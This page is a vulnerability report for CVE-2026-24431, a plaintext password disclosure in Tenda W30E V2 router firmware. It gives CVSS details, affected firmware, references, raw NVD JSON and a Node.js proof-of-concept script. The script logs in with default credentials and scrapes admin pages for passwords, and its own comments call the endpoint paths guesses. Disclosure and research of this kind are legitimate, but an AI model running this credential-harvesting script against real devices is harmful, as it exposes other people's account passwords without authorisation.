Security Vulnerability Report
CVE-2026-24431 CVSS 6.5 MEDIUM

CVE-2026-24431

Published: 2026-01-26 18:16:41
Last Modified: 2026-01-28 20:14:45

Description

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) display stored user account passwords in plaintext within the administrative web interface (CWE-317, cleartext storage of sensitive information in a GUI). Any user with access to the affected management pages — i.e. anyone holding an authenticated session, even a low-privileged one (PR:L in the CVSS vector) — can directly view credentials.

CVSS Details

CVSS Score
6.5 (NVD primary CVSS v3.1 metric; the CNA's secondary CVSS v4.0 metric in the raw data below scores the same issue 7.1 HIGH)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:* - NOT VULNERABLE (this is the hardware-platform node of an AND configuration: the device itself is not flagged, the firmware running on it is what is affected)
Tenda W30E V2 V16.01.0.19(5037) and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript (Node.js; the snippet uses require('axios'), not Python)
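// CVE-2026-24431 PoC - Tenda W30E V2 plaintext password disclosure
// Author: Security Researcher
// Target: Tenda W30E V2 firmware <= V16.01.0.19(5037)
//
// What it does: logs in to the router's web UI with a known account (a
// low-privileged one is enough per the CVSS vector, PR:L), then fetches a
// handful of management pages and greps the responses for tokens of the
// form password="..." / password: '...'.
//
// Caveats before running:
//   * The login endpoint (/login.cgi) and the candidate page list are
//     educated guesses, NOT taken from the advisory, which only says
//     "the administrative web interface". Confirm the real paths by
//     proxying a browser session first.
//   * Everything goes over plain HTTP, so the test credentials and any
//     disclosed ones cross the wire in clear text. Use a lab network.
//   * For authorized testing only.
'use strict';

const axios = require('axios');

// Configuration. Overridable through the environment so the script need
// not be edited per target; the literals are the original defaults.
const TARGET_IP = process.env.TARGET_IP ?? '192.168.0.1'; // Router IP
const USERNAME = process.env.TARGET_USER ?? 'admin';
const PASSWORD = process.env.TARGET_PASS ?? 'admin';
const REQUEST_TIMEOUT_MS = 10000; // an unresponsive device should not hang the scan

// Management pages that may render stored account passwords.
// NOTE(review): guessed paths — verify against the actual firmware.
const CANDIDATE_PATHS = [
  '/user_mgnt.cgi',
  '/admin/account.asp',
  '/cgi-bin/user_mgnt',
  '/cgi-bin/account_list',
  '/system_status.asp',
];

// password="value" / password: 'value' with a non-empty value. This can
// also match unrelated literals (e.g. a JS `password: "required"`), so
// treat hits as leads to confirm by hand, not as proof.
const PASSWORD_PATTERN = /password['"]?\s*[:=]\s*['"]([^'"]+)['"]/gi;

/**
 * Reduce Set-Cookie headers to the "name=value" pairs a client sends back.
 * Joining the raw header strings (as the original did) would replay
 * attributes such as `Path=/; HttpOnly` as if they were cookies.
 * @param {string[] | undefined} setCookie - raw Set-Cookie header values
 * @returns {string} value for the Cookie request header ('' when none)
 */
function cookieHeaderFrom(setCookie) {
  if (!Array.isArray(setCookie)) return '';
  return setCookie
    .map((c) => c.split(';')[0].trim())
    .filter((c) => c !== '')
    .join('; ');
}

/**
 * Find password-looking tokens in a response body.
 * axios parses JSON bodies into objects; calling .match() on one throws,
 * and the original swallowed that as "path not accessible".
 * @param {unknown} body - response.data (string, object, or nullish)
 * @returns {string[]} matched tokens, possibly empty
 */
function findPasswordTokens(body) {
  const text = typeof body === 'string' ? body : JSON.stringify(body ?? '');
  return text.match(PASSWORD_PATTERN) ?? [];
}

/**
 * Run the PoC against TARGET_IP: authenticate, then probe each candidate
 * page. Network errors are reported and never thrown past this function.
 */
async function exploit() {
  console.log('[+] CVE-2026-24431 PoC - Tenda W30E V2 Password Disclosure');
  console.log('[+] Target:', TARGET_IP);
  const base = `http://${TARGET_IP}`;

  try {
    // Step 1: log in. The firmware's login response format is not known
    // here, so success cannot be verified — the status and the presence
    // of a session cookie are the only signals reported.
    const loginData = new URLSearchParams({ username: USERNAME, password: PASSWORD });
    const loginResponse = await axios.post(`${base}/login.cgi`, loginData, {
      headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
      timeout: REQUEST_TIMEOUT_MS,
    });
    console.log(`[+] Login request sent (HTTP ${loginResponse.status})`);

    const cookieHeader = cookieHeaderFrom(loginResponse.headers['set-cookie']);
    if (cookieHeader === '') {
      console.log('[!] No session cookie returned; login may have failed, continuing anyway');
    }

    // Step 2: fetch the candidate pages and look for plaintext passwords.
    for (const path of CANDIDATE_PATHS) {
      try {
        const response = await axios.get(`${base}${path}`, {
          headers: { Cookie: cookieHeader },
          timeout: REQUEST_TIMEOUT_MS,
        });
        const hits = findPasswordTokens(response.data);
        if (hits.length > 0) {
          console.log(`[+] Found plaintext passwords at ${path}:`);
          for (const hit of hits) {
            console.log(' ', hit);
          }
        }
      } catch (err) {
        // One missing page says nothing about the others, so keep going,
        // but say why instead of a blanket "not accessible".
        console.log(`[-] Path ${path}: ${err.message}`);
      }
    }

    console.log('[+] Scan complete');
  } catch (error) {
    console.error('[-] Error:', error.message);
  }
}

exploit();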

References

- https://www.tendacn.com/product/W30E (vendor product page)
- https://www.vulncheck.com/advisories/tenda-w30e-v2-missing-csrf-protections-for-administrative-actions (tagged "Not Applicable" in the NVD record: it describes a separate CSRF issue on the same device, not this password disclosure)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24431", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:40.567", "lastModified": "2026-01-28T20:14:45.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) display stored user account passwords in plaintext within the administrative web interface. Any user with access to the affected management pages can directly view credentials."}, {"lang": "es", "value": "Las versiones de firmware de Shenzhen Tenda W30E V2 hasta e incluyendo V16.01.0.19(5037) muestran las contraseñas de cuentas de usuario almacenadas en texto plano dentro de la interfaz web administrativa. Cualquier usuario con acceso a las páginas de administración afectadas puede ver directamente las credenciales."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": 
"NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-317"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.01.0.19\\(5037\\)", "matchCriteriaId": "4DB07B19-71FC-4936-98BD-36A8B3B7CBF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "56B9C2BB-D36E-40F8-83FF-FC919337F6BD"}]}]}], "references": [{"url": "https://www.tendacn.com/product/W30E", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-missing-csrf-protections-for-administrative-actions", "source": "[email protected]", "tags": ["Not Applicable"]}]}}